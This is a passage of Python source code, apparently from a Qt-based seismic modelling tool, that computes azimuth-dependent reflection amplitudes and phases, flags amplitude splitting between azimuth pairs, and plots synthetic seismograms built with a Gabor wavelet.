fase_z_60.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_60.close()
geo_60 = np.asarray(geofone_60)
x_60 = np.asarray(x_60)
y_60 = np.asarray(y_60)
z_60 = np.asarray(z_60)
xc_60 = np.asarray(xc_60)
yc_60 = np.asarray(yc_60)
zc_60 = np.asarray(zc_60)
x60_re = np.fliplr([x_60])[0]
y60_re = np.fliplr([y_60])[0]
z60_re = np.fliplr([z_60])[0]
x60c_re = np.fliplr([xc_60])[0]
y60c_re = np.fliplr([yc_60])[0]
z60c_re = np.fliplr([zc_60])[0]
ampx_60 = np.sqrt(x60_re ** 2 + x60c_re ** 2)
ampy_60 = np.sqrt(y60_re ** 2 + y60c_re ** 2)
ampz_60 = np.sqrt(z60_re ** 2 + z60c_re ** 2)
phx_60 = np.arctan2(x60c_re, x60_re)
phy_60 = np.arctan2(y60c_re, y60_re)
phz_60 = np.arctan2(z60c_re, z60_re)
self.hti_fase_rad_60 = phx_60
self.hti_fase_z_60 = phz_60
geo60_re = self.dist
tot60 = np.sqrt(ampx_60 ** 2 + ampy_60 ** 2 + ampz_60 ** 2)
rad_60 = np.sqrt(ampx_60 ** 2 + ampy_60 ** 2)
solo_x_60 = np.asarray(solo_x_60)
solo_x_60 = np.fliplr([solo_x_60])[0]
solo_y_60 = np.asarray(solo_y_60)
solo_y_60 = np.fliplr([solo_y_60])[0]
solo_z_60 = np.asarray(solo_z_60)
solo_z_60 = np.fliplr([solo_z_60])[0]
solo_60_tot = np.sqrt(solo_x_60 ** 2 + solo_y_60 ** 2 + solo_z_60 ** 2)
solo_rad_60 = np.sqrt(solo_x_60 ** 2 + solo_y_60 ** 2)
fase_x_60 = np.asarray(fase_x_60)
fase_x_60 = np.fliplr([fase_x_60])[0]
fase_y_60 = np.asarray(fase_y_60)
fase_y_60 = np.fliplr([fase_y_60])[0]
fase_z_60 = np.asarray(fase_z_60)
fase_z_60 = np.fliplr([fase_z_60])[0]
self.refl_solo_x_60 = solo_rad_60
self.refl_solo_y_60 = solo_y_60
self.refl_solo_z_60 = solo_z_60
self.refl_tot_60 = tot60
self.refl_rad_60 = rad_60
self.refl_y_60 = y60_re
self.refl_z_60 = ampz_60
self.axes_anray_tot.plot(geo60_re, tot60, label=60)
self.axes_anray_rad.plot(geo60_re, rad_60, label=60)
self.axes_anray_z.plot(geo60_re, ampz_60, label=60)
if two_layer == True:
self.axes_anray2_z.plot(geo60_re, solo_z_60, label=60)
self.axes_anray2_tot.plot(geo60_re, solo_60_tot, label=60)
self.axes_anray2_rad.plot(geo60_re, solo_rad_60, label=60)
for line in f_90:
coluna = line.split()
if float(coluna[0]) == var:
geofone_90.append(int(coluna[1]))
x_90.append(float(coluna[3]))
y_90.append(float(coluna[5]))
z_90.append(float(coluna[7]))
xc_90.append(float(coluna[4]))
yc_90.append(float(coluna[6]))
zc_90.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_90.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_90.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_90.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_90.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_90.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_90.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_90.close()
geo_90 = np.asarray(geofone_90)
x_90 = np.asarray(x_90)
y_90 = np.asarray(y_90)
z_90 = np.asarray(z_90)
xc_90 = np.asarray(xc_90)
yc_90 = np.asarray(yc_90)
zc_90 = np.asarray(zc_90)
x90_re = np.fliplr([x_90])[0]
y90_re = np.fliplr([y_90])[0]
z90_re = np.fliplr([z_90])[0]
x90c_re = np.fliplr([xc_90])[0]
y90c_re = np.fliplr([yc_90])[0]
z90c_re = np.fliplr([zc_90])[0]
ampx_90 = np.sqrt(x90_re ** 2 + x90c_re ** 2)
ampy_90 = np.sqrt(y90_re ** 2 + y90c_re ** 2)
ampz_90 = np.sqrt(z90_re ** 2 + z90c_re ** 2)
phx_90 = np.arctan2(x90c_re, x90_re)
phy_90 = np.arctan2(y90c_re, y90_re)
phz_90 = np.arctan2(z90c_re, z90_re)
self.hti_fase_rad_90 = phx_90
self.hti_fase_z_90 = phz_90
geo90_re = self.dist
tot90 = np.sqrt(ampx_90 ** 2 + ampy_90 ** 2 + ampz_90 ** 2)
rad_90 = np.sqrt(ampx_90 ** 2 + ampy_90 ** 2)
solo_x_90 = np.asarray(solo_x_90)
solo_x_90 = np.fliplr([solo_x_90])[0]
solo_y_90 = np.asarray(solo_y_90)
solo_y_90 = np.fliplr([solo_y_90])[0]
solo_z_90 = np.asarray(solo_z_90)
solo_z_90 = np.fliplr([solo_z_90])[0]
solo_90_tot = np.sqrt(solo_x_90 ** 2 + solo_y_90 ** 2 + solo_z_90 ** 2)
solo_rad_90 = np.sqrt(solo_x_90 ** 2 + solo_y_90 ** 2)
fase_x_90 = np.asarray(fase_x_90)
fase_x_90 = np.fliplr([fase_x_90])[0]
fase_y_90 = np.asarray(fase_y_90)
fase_y_90 = np.fliplr([fase_y_90])[0]
fase_z_90 = np.asarray(fase_z_90)
fase_z_90 = np.fliplr([fase_z_90])[0]
self.refl_solo_x_90 = solo_rad_90
self.refl_solo_y_90 = solo_y_90
self.refl_solo_z_90 = solo_z_90
self.refl_tot_90 = tot90
self.refl_rad_90 = rad_90
self.refl_y_90 = y90_re
self.refl_z_90 = ampz_90
self.axes_anray_tot.plot(geo90_re, tot90, label=90)
self.axes_anray_rad.plot(geo90_re, rad_90, label=90)
self.axes_anray_z.plot(geo90_re, ampz_90, label=90)
self.axes_anray_tot.legend(title='Azimute', fontsize=6, loc=2, ncol=5, bbox_to_anchor=(0, 1.5))
if two_layer == True:
self.axes_anray2_z.plot(geo90_re, solo_z_90, label=90)
self.axes_anray2_tot.plot(geo90_re, solo_90_tot, label=90)
self.axes_anray2_rad.plot(geo90_re, solo_rad_90, label=90)
self.axes_anray2_tot.legend(title='Azimute', fontsize=6, loc=2, ncol=5, bbox_to_anchor=(0, 1.4))
if self.split_box_anray_0_90.isChecked():
split_tot = np.zeros(len(geo0_re))
split_rad = np.zeros(len(geo0_re))
split_z = np.zeros(len(geo0_re))
for i in range(len(geo0_re)):
if tot0[i] > tot90[i]:
split_tot[i] = (tot0[i]-tot90[i])/tot90[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo0_re[i], tot0[i], 'r+')
self.axes_anray_tot.plot(geo0_re[i], tot90[i], 'r+')
else:
split_tot[i] = (tot90[i] - tot0[i]) / tot0[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo0_re[i], tot0[i], 'r+')
self.axes_anray_tot.plot(geo0_re[i], tot90[i], 'r+')
if abs(rad_0[i]) > abs(rad_90[i]):
split_rad[i] = (abs(rad_0[i])-abs(rad_90[i]))/abs(rad_90[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo0_re[i], rad_0[i], 'r+')
self.axes_anray_rad.plot(geo0_re[i], rad_90[i], 'r+')
else:
split_rad[i] = (abs(rad_90[i]) - abs(rad_0[i])) / abs(rad_0[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo0_re[i], rad_0[i], 'r+')
self.axes_anray_rad.plot(geo0_re[i], rad_90[i], 'r+')
if abs(ampz_0[i]) > abs(ampz_90[i]):
split_z[i] = (abs(ampz_0[i])-abs(ampz_90[i]))/abs(ampz_90[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo0_re[i], ampz_0[i], 'r+')
self.axes_anray_z.plot(geo0_re[i], ampz_90[i], 'r+')
else:
split_z[i] = (abs(ampz_90[i]) - abs(ampz_0[i])) / abs(ampz_0[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo0_re[i], ampz_0[i], 'r+')
self.axes_anray_z.plot(geo0_re[i], ampz_90[i], 'r+')
self.axes_anray_tot2.bar(geo0_re, split_tot, width=0.7, alpha=0.1, color='red')
self.axes_anray_rad2.bar(geo0_re, split_rad, width=0.7, alpha=0.1, color='red')
self.axes_anray_z2.bar(geo0_re, split_z, width=0.7, alpha=0.1, color='red')
if self.split_box_anray_0_45.isChecked():
split_tot = np.zeros(len(geo45_re))
split_rad = np.zeros(len(geo45_re))
split_z = np.zeros(len(geo45_re))
for i in range(len(geo45_re)):
if tot0[i] > tot45[i]:
split_tot[i] = (tot0[i] - tot45[i]) / tot45[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot0[i], 'b+')
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'b+')
else:
split_tot[i] = (tot45[i] - tot0[i]) / tot0[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot0[i], 'b+')
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'b+')
if abs(rad_0[i]) > abs(rad_45[i]):
split_rad[i] = (abs(rad_0[i]) - abs(rad_45[i])) / abs(rad_45[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_0[i], 'b+')
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'b+')
else:
split_rad[i] = (abs(rad_45[i]) - abs(rad_0[i])) / abs(rad_0[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_0[i], 'b+')
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'b+')
if abs(ampz_0[i]) > abs(ampz_45[i]):
split_z[i] = (abs(ampz_0[i]) - abs(ampz_45[i])) / abs(ampz_45[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_0[i], 'b+')
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'b+')
else:
split_z[i] = (abs(ampz_45[i]) - abs(ampz_0[i])) / abs(ampz_0[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_0[i], 'b+')
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'b+')
self.axes_anray_tot2.bar(geo45_re, split_tot, width=0.7, alpha=0.1, color='blue')
self.axes_anray_rad2.bar(geo45_re, split_rad, width=0.7, alpha=0.1, color='blue')
self.axes_anray_z2.bar(geo45_re, split_z, width=0.7, alpha=0.1, color='blue')
if self.split_box_anray_30_60.isChecked():
split_tot = np.zeros(len(geo30_re))
split_rad = np.zeros(len(geo30_re))
split_z = np.zeros(len(geo30_re))
for i in range(len(geo30_re)):
if tot30[i] > tot60[i]:
split_tot[i] = (tot30[i] - tot60[i]) / tot60[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo30_re[i], tot30[i], 'g+')
self.axes_anray_tot.plot(geo30_re[i], tot60[i], 'g+')
else:
split_tot[i] = (tot60[i] - tot30[i]) / tot30[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo30_re[i], tot30[i], 'g+')
self.axes_anray_tot.plot(geo30_re[i], tot60[i], 'g+')
if abs(rad_30[i]) > abs(rad_60[i]):
split_rad[i] = (abs(rad_30[i]) - abs(rad_60[i])) / abs(rad_60[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo30_re[i], rad_30[i], 'g+')
self.axes_anray_rad.plot(geo30_re[i], rad_60[i], 'g+')
else:
split_rad[i] = (abs(rad_60[i]) - abs(rad_30[i])) / abs(rad_30[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo30_re[i], rad_30[i], 'g+')
self.axes_anray_rad.plot(geo30_re[i], rad_60[i], 'g+')
if abs(ampz_30[i]) > abs(ampz_60[i]):
split_z[i] = (abs(ampz_30[i]) - abs(ampz_60[i])) / abs(ampz_60[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo30_re[i], ampz_30[i], 'g+')
self.axes_anray_z.plot(geo30_re[i], ampz_60[i], 'g+')
else:
split_z[i] = (abs(ampz_60[i]) - abs(ampz_30[i])) / abs(ampz_30[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo30_re[i], ampz_30[i], 'g+')
self.axes_anray_z.plot(geo30_re[i], ampz_60[i], 'g+')
self.axes_anray_tot2.bar(geo30_re, split_tot, width=0.7, alpha=0.1, color='green')
self.axes_anray_rad2.bar(geo30_re, split_rad, width=0.7, alpha=0.1, color='green')
self.axes_anray_z2.bar(geo30_re, split_z, width=0.7, alpha=0.1, color='green')
if self.split_box_anray_45_90.isChecked():
split_tot = np.zeros(len(geo45_re))
split_rad = np.zeros(len(geo45_re))
split_z = np.zeros(len(geo45_re))
for i in range(len(geo45_re)):
if tot45[i] > tot90[i]:
split_tot[i] = (tot45[i] - tot90[i]) / tot90[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'y+')
self.axes_anray_tot.plot(geo45_re[i], tot90[i], 'y+')
else:
split_tot[i] = (tot90[i] - tot45[i]) / tot45[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'y+')
self.axes_anray_tot.plot(geo45_re[i], tot90[i], 'y+')
if abs(rad_45[i]) > abs(rad_90[i]):
split_rad[i] = (abs(rad_45[i]) - abs(rad_90[i])) / abs(rad_90[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'y+')
self.axes_anray_rad.plot(geo45_re[i], rad_90[i], 'y+')
else:
split_rad[i] = (abs(rad_90[i]) - abs(rad_45[i])) / abs(rad_45[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'y+')
self.axes_anray_rad.plot(geo45_re[i], rad_90[i], 'y+')
if abs(ampz_45[i]) > abs(ampz_90[i]):
split_z[i] = (abs(ampz_45[i]) - abs(ampz_90[i])) / abs(ampz_90[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'y+')
self.axes_anray_z.plot(geo45_re[i], ampz_90[i], 'y+')
else:
split_z[i] = (abs(ampz_90[i]) - abs(ampz_45[i])) / abs(ampz_45[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'y+')
self.axes_anray_z.plot(geo45_re[i], ampz_90[i], 'y+')
self.axes_anray_tot2.bar(geo45_re, split_tot, width=0.7, alpha=0.1, color='yellow')
self.axes_anray_rad2.bar(geo45_re, split_rad, width=0.7, alpha=0.1, color='yellow')
self.axes_anray_z2.bar(geo45_re, split_z, width=0.7, alpha=0.1, color='yellow')
self.canvas_anray.draw()
self.canvas_anray2.draw()
except:
self.message()
self.plot_sismograma()
#Updates and displays the maximum reflection coefficients for the selected azimuth; xv is the radial component and zv the vertical one
def plot_sismograma_v(self):
if self.radioButton_0.isChecked():
xv = self.refl_rad_0
zv = self.refl_z_0
if self.radioButton_30.isChecked():
xv = self.refl_rad_30
zv = self.refl_z_30
if self.radioButton_45.isChecked():
xv = self.refl_rad_45
zv = self.refl_z_45
if self.radioButton_60.isChecked():
xv = self.refl_rad_60
zv = self.refl_z_60
if self.radioButton_90.isChecked():
xv = self.refl_rad_90
zv = self.refl_z_90
self.label_x_max.setText(str((round(np.max(abs(xv)), 4))))
self.label_z_max.setText(str((round(np.max(abs(zv)), 4))))
#Plots the seismogram
def plot_sismograma(self):
self.axes_sismo_x.cla()
self.axes_sismo_z.cla()
Tmax = self.doubleSpinBox_tmax.value()
dt = self.doubleSpinBox_dt.value()
NS = int((Tmax / dt) + 1)
t = np.arange(NS) * dt
t1 = self.time_basalto
x1 = self.spinBox_rmin.value()
dx = self.spinBox_rstep.value()
NX = self.spinBox_ngeo.value()
x = np.arange(NX) * dx + x1
normal_f = self.doubleSpinBox_normalf.value()
dados_x = np.zeros([NX, NS])
dados_z = np.zeros([NX, NS])
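# The synthetic seismogram is built trace by trace: a unit spike is placed at the reflection
# arrival time and later convolved with a wavelet scaled by the corresponding reflection coefficient.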
FREQ = self.doubleSpinBox_freq.value()
OMEGA = 2 * np.pi * FREQ
GAMA = self.doubleSpinBox_gama.value()
PSI = 0.
TSH = 0.45 * GAMA / FREQ
tw = np.arange(-TSH, TSH + dt, dt)
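# tw is the time axis of a Gabor-type wavelet, cos(OMEGA*t + phase) * exp(-(OMEGA*t/GAMA)**2):
# a cosine of frequency FREQ modulated by a Gaussian whose width is set by GAMA and truncated at +/- TSH.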
wr_hti = []
wz_hti = []
wr_solo = []
wz_solo = []
for i in range(0, NX):
ni = int(t1[i] / dt)
dados_x[i, ni] = 1
dados_z[i, ni] = 1
if self.checkBox_solo.isChecked():
self.frame_12.setEnabled(True)
self.checkBox_solo_sismo.setEnabled(True)
self.label_47.setEnabled(True)
t2 = self.time_solo
dados_solo_x = np.zeros([NX, NS])
dados_solo_z = np.zeros([NX, NS])
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.solo_fase_rad[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.solo_fase_z[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_solo.append(wr)
wz_solo.append(wz)
ni2 = int(t2[i] / dt)
dados_solo_x[i, ni2] = 1
dados_solo_z[i, ni2] = 1
if self.radioButton_0.isChecked():
xv = self.refl_rad_0
zv = self.refl_z_0
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_rad_0
zv2 = self.refl_solo_z_0
if self.radioButton_30.isChecked():
xv = self.refl_rad_30
zv = self.refl_z_30
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_30
zv2 = self.refl_solo_z_30
if self.radioButton_45.isChecked():
xv = self.refl_rad_45
zv = self.refl_z_45
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_45
zv2 = self.refl_solo_z_45
if self.radioButton_60.isChecked():
xv = self.refl_rad_60
zv = self.refl_z_60
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_60
zv2 = self.refl_solo_z_60
if self.radioButton_90.isChecked():
xv = self.refl_rad_90
zv = self.refl_z_90
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_90
zv2 = self.refl_solo_z_90
self.plot_sismograma_v()
fatorganhodisplay = normal_f
if self.radioButton_normx.isChecked():
fatorganhodisplay = 1/np.max(abs(xv))
if self.radioButton_normz.isChecked():
fatorganhodisplay = 1/np.max(abs(zv))
if self.radioButton_norm_def.isChecked():
fatorganhodisplay = 1/self.doubleSpinBox_normalf.value()
for i in range(dados_x.shape[0]):
wx = wr_hti[i]*xv[i]
wz = wz_hti[i]*zv[i]
dados_x[i, :] = np.convolve(dados_x[i, :], wx, mode='same')
dados_z[i, :] = np.convolve(dados_z[i, :], wz, mode='same')
if self.checkBox_solo_sismo.isChecked():
self.checkBox_solo_sismo2.setEnabled(True)
for i in range(dados_x.shape[0]):
if self.checkBox_solo_sismo2.isChecked():
if i == 0:
wx2 = wr_solo[i] * xv2[i]
wz2 = wz_solo[i] * zv2[i]
dados_solo_x[i, :] = np.convolve(dados_solo_x[i, :], wx2, mode='same')
dados_solo_z[i, :] = np.convolve(dados_solo_z[i, :], wz2, mode='same')
else:
dados_solo_x[i, :] = 0
dados_solo_z[i, :] = 0
else:
wx2 = wr_solo[i] * xv2[i]
wz2 = wz_solo[i] * zv2[i]
dados_solo_x[i, :] = np.convolve(dados_solo_x[i, :], wx2, mode='same')
dados_solo_z[i, :] = np.convolve(dados_solo_z[i, :], wz2, mode='same')
for i in range(0, NX):
data_x = x[i]+ (dados_x[i] + dados_solo_x[i]) * fatorganhodisplay
data_z = x[i] +(dados_z[i] + dados_solo_z[i]) * fatorganhodisplay
self.axes_sismo_x.plot(data_x, t, '-', color='black')
self.axes_sismo_z.plot(data_z, t, '-', color='black')
self.axes_sismo_x.fill_betweenx(t, x[i], data_x, where=(data_x > x[i]), color='black')
self.axes_sismo_z.fill_betweenx(t, x[i], data_z, where=(data_z > x[i]), color='black')
self.axes_sismo_x.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.axes_sismo_z.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
else:
for i in range(0, NX):
data_x = x[i] + dados_x[i] * fatorganhodisplay
data_z = x[i] + dados_z[i] * fatorganhodisplay
self.axes_sismo_x.plot(data_x, t, '-', color='black')
self.axes_sismo_z.plot(data_z, t, '-', color='black')
self.axes_sismo_x.fill_betweenx(t, x[i], data_x , where=(data_x > x[i]), color='black')
self.axes_sismo_z.fill_betweenx(t, x[i], data_z, where=(data_z > x[i]), color='black')
self.axes_sismo_x.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.axes_sismo_z.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.canvas_sismo.draw()
self.plot_sismo_azim()
self.az_tmax.setValue(np.max(t))
#Plots seismograms of the same component for two different azimuths, normalized so that the larger of the two maxima equals 1.
def plot_sismo_azim(self):
self.axes_sismo2_1.cla()
self.axes_sismo2_2.cla()
Tmax = self.doubleSpinBox_tmax.value()
dt = self.doubleSpinBox_dt.value()
NS = int((Tmax / dt) + 1)
t = np.arange(NS) * dt
t1 = self.time_basalto
x1 = self.spinBox_rmin.value()
dx = self.spinBox_rstep.value()
NX = self.spinBox_ngeo.value()
x = np.arange(NX) * dx + x1
dados_1 = np.zeros([NX, NS])
dados_2 = np.zeros([NX, NS])
w_1=[]
w_2=[]
r1 = 0
r2 = 0
try:
for i in range(0, NX):
ni = int(t1[i] / dt)
dados_1[i, ni] = 1
dados_2[i, ni] = 1
FREQ = 50
OMEGA = 2 * np.pi * FREQ
GAMA = 4.
PSI = 0.
TSH = 0.45 * GAMA / FREQ
tw = np.arange(-TSH, TSH + dt, dt)
w = np.cos(OMEGA * tw + PSI) * np.exp(-(OMEGA * tw / GAMA) ** 2)
if self.radio_sismo_0_90.isChecked():
label1 = '0'
label2 = '90'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_0
r2 = self.refl_rad_90
max_1 = np.max(abs(self.refl_rad_0))
max_2 = np.max(abs(self.refl_rad_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_0
r2 = self.refl_z_90
max_1 = np.max(abs(self.refl_z_0))
max_2 = np.max(abs(self.refl_z_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_0_45.isChecked():
label1 = '0'
label2 = '45'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_0
r2 = self.refl_rad_45
max_1 = np.max(abs(self.refl_rad_0))
max_2 = np.max(abs(self.refl_rad_45))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_0
r2 = self.refl_z_45
max_1 = np.max(abs(self.refl_z_0))
max_2 = np.max(abs(self.refl_z_45))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_30_60.isChecked():
label1 = '30'
label2 = '60'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_30
r2 = self.refl_rad_60
max_1 = np.max(abs(self.refl_rad_30))
max_2 = np.max(abs(self.refl_rad_60))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_30
r2 = self.refl_z_60
max_1 = np.max(abs(self.refl_z_30))
max_2 = np.max(abs(self.refl_z_60))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_45_90.isChecked():
label1 = '45'
label2 = '90'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_45
r2 = self.refl_rad_90
max_1 = np.max(abs(self.refl_rad_45))
max_2 = np.max(abs(self.refl_rad_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_45
r2 = self.refl_z_90
max_1 = np.max(abs(self.refl_z_45))
max_2 = np.max(abs(self.refl_z_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
for i in range(dados_1.shape[0]):
w1 = w_1[i] * r1[i]
w2 = w_2[i] * r2[i]
dados_1[i, :] = np.convolve(dados_1[i, :], w1, mode='same')
dados_2[i, :] = np.convolve(dados_2[i, :], w2, mode='same')
if max_1 > max_2:
fatorganhodisplay = 1/max_1
else:
fatorganhodisplay = 1/max_2
for i in range(0, NX):
data_1 = x[i] + dados_1[i] * fatorganhodisplay
data_2 = x[i] + dados_2[i] * fatorganhodisplay
self.axes_sismo2_1.plot(data_1, t, '-', color='black')
self.axes_sismo2_1.set_title('azimute %s' %label1)
self.axes_sismo2_1.set_ylabel('Tempo (s)')
self.axes_sismo2_1.set_xlabel('Distância (m)')
self.axes_sismo2_1.fill_betweenx(t, x[i], data_1 , where=(data_1 > x[i]), color='black')
self.axes_sismo2_2.plot(data_2, t, '-', color='black')
self.axes_sismo2_2.set_title('azimute %s' %label2)
self.axes_sismo2_2.set_ylabel('Tempo (s)')
self.axes_sismo2_2.set_xlabel('Distância (m)')
self.axes_sismo2_2.fill_betweenx(t, x[i], data_2, where=(data_2 > x[i]), color='black')
self.axes_sismo2_1.set_ylim([self.az_tmax.value(), self.az_tmin.value()])
self.axes_sismo2_2.set_ylim([self.az_tmax.value(), self.az_tmin.value()])
self.canvas_sismo2.draw()
except:
self.message()
def sismo_enable(self):
if self.checkBox_solo_sismo.isChecked():
self.checkBox_solo_sismo2.setEnabled(True)
else:
self.checkBox_solo_sismo2.setEnabled(False)
# Converts geophone offsets to incidence angles (single layer)
def geofone_to_angle(self, number, rmin, rstep, prof):
a = []
for i in range(number):
if i == 0:
a.append(rmin)
dist = rmin
else:
dist = dist + rstep
a.append(dist)
array = np.asarray(a)
angles = np.degrees(np.arctan((array / 2) / prof))
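# For a flat reflector at depth prof and source-receiver offset r, the incidence angle
# of the reflected ray satisfies tan(theta) = (r/2)/prof.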
return angles, a
# Converts geophone offsets to angles (two layers),
# v1 = velocity in the soil, v2 = velocity in layer 1
# p1 = soil thickness, p2 = thickness of layer 1
def geofone_to_angle_2(self, number, rmin, rstep, v1, v2, p1, p2):
li = []
for i in range(number):
if i == 0:
li.append(rmin)
dist = rmin
else:
dist = dist + rstep
li.append(dist)
arr = np.asarray(li)
a = v1 ** 2 - v2 ** 2
z = arr / 2
